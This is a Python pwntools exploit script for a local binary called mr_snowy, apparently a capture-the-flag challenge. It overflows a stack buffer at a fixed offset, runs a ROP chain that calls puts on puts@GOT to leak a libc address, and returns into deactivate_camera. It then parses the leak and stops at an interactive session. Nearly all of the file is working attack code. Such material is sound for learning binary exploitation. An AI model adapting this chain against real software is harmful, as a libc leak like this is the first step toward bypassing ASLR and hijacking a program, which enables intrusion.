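#!/usr/bin/env python3
"""Stage-one exploit for ./mr_snowy.

Overflows the stack buffer behind the menu's read(), then runs a ROP chain that
calls puts(puts@GOT) to leak the runtime address of libc's puts and returns
into deactivate_camera() so the process keeps running afterwards.

Only pwntools (``pwn``) is required. The chain uses absolute PLT/GOT/function
addresses, so the target is assumed to be non-PIE — confirm with ``checksec``.
The original script only printed the leak through ``interactive()``; this
version also parses and logs it (see ``recv_leak``) but still stops at the
interactive shell — using the leak for a second stage is out of scope here.
"""
from pwn import *

context.arch = 'amd64'

# Distance from the start of the overflowed buffer to the saved return address.
# Inherited from the original script; re-derive with a cyclic pattern if the
# binary is rebuilt.
offset = 0x48

elf = ELF('./mr_snowy')
p = elf.process()


def do_read():
    """Consume target output up to and including the next ``>`` menu prompt.

    Replaces the original ``read()``-until-``>`` loop: ``recvuntil`` copes with
    the prompt arriving split across reads and raises ``EOFError`` if the
    target dies instead of spinning on an empty read.
    """
    return p.recvuntil(b'>')


def build_payload():
    """Return padding plus the ROP chain: ``puts(puts@GOT)`` then ``deactivate_camera()``.

    ``elf.symbols['puts']`` resolves to the PLT stub for an imported puts, which
    is what the chain needs. Returning into ``deactivate_camera`` afterwards
    keeps the process alive — presumably it is the function containing the
    overflow, which would allow a second chain; verify in the disassembly.
    """
    rop = ROP(elf)
    rop.call(elf.symbols['puts'], [elf.got['puts']])
    rop.call(elf.symbols['deactivate_camera'])
    log.info('ROP chain:\n%s' % rop.dump())
    return b'\xaa' * offset + rop.chain()


def recv_leak(timeout=2):
    """Read the line puts() emits for puts@GOT and return it as an int, or None.

    Assumes the first line after the overflow is the raw 6-byte address with no
    preceding text — TODO confirm against the binary's output; if the program
    prints something first, consume it with ``p.recvuntil()`` before calling
    this. A line that is empty (timeout) or longer than 8 bytes is logged and
    skipped rather than unpacked, so a mismatch degrades to a warning, not a
    crash.
    """
    try:
        line = p.recvline(keepends=False, timeout=timeout)
    except EOFError:
        # Process died before the chain produced output; a wrong offset or a
        # misaligned stack at the puts() call are the usual suspects — confirm.
        log.failure('target exited before leaking puts@libc')
        return None
    if not 0 < len(line) <= 8:
        log.warning('unexpected leak line: %r' % line)
        return None
    leaked = u64(line.ljust(8, b'\x00'))
    log.success('puts@libc = %#x' % leaked)
    return leaked


def main():
    """Drive the menu to the vulnerable read(), send the chain, drop to a shell."""
    # Skip the menu: option '1' is the path that reaches the affected read().
    do_read()
    p.sendline(b'1')
    do_read()

    p.sendline(build_payload())
    recv_leak()
    p.interactive()


if __name__ == '__main__':
    main()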